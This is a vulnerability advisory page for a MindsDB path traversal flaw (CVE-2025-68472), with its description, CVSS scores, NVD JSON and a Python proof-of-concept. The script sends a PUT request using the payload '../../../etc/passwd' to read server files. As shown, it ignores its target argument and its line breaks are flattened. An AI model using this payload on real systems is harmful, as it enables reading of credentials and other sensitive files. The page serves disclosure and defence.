Security Vulnerability Report
中文
CVE-2025-68472 CVSS 8.1 HIGH

CVE-2025-68472

Published: 2026-01-12 17:15:53
Last Modified: 2026-02-20 17:25:51
Source: [email protected]

Description

MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not "url". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:* - VULNERABLE
MindsDB < 25.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-68472 PoC - MindsDB Path Traversal File Read # Target: MindsDB server < 25.11.1 TARGET_URL = "http://target:47334/api/file/upload" def exploit_path_traversal(target_ip): """ Exploit the unauthenticated path traversal vulnerability in MindsDB file upload API to read arbitrary files. """ headers = { "Content-Type": "application/json" } # Payload to read /etc/passwd via path traversal # The vulnerable code joins user-controlled filename to filesystem path payload = { "source_type": "files", # Not 'url', triggers vulnerable code path "name": "test", "original_filename": "../../../etc/passwd" # Path traversal payload } try: response = requests.put( TARGET_URL, headers=headers, json=payload, timeout=10 ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text}") # Check if file was successfully moved to MindsDB storage if response.status_code == 200: data = response.json() print(f"[+] File moved to storage: {data}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import sys target = sys.argv[1] if len(sys.argv) > 1 else "localhost" exploit_path_traversal(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68472", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:52.887", "lastModified": "2026-02-20T17:25:50.507", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not \"url\". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1."}, {"lang": "es", "value": "MindsDB es una plataforma para construir inteligencia artificial a partir de datos empresariales. Antes de la versión 25.11.1, un salto de ruta no autenticado en la API de carga de archivos permite a cualquier llamador leer archivos arbitrarios del sistema de archivos del servidor y moverlos al almacenamiento de MindsDB, exponiendo datos sensibles. El manejador PUT en file.py une directamente datos controlados por el usuario en una ruta del sistema de archivos cuando el cuerpo de la solicitud es JSON y source_type no es 'url'. Solo las cargas multipart y las cargas con origen en URL reciben saneamiento; las cargas JSON carecen de cualquier llamada a clear_filename o comprobaciones equivalentes. Esta vulnerabilidad está corregida en 25.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-23"}, {"lang": "en", "value": "CWE-36"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.11.1", "matchCriteriaId": "3B7E2336-7EE3-4597-A6C6-FAA24532F38C"}]}]}], "references": [{"url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-qqhf-pm3j-96g7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.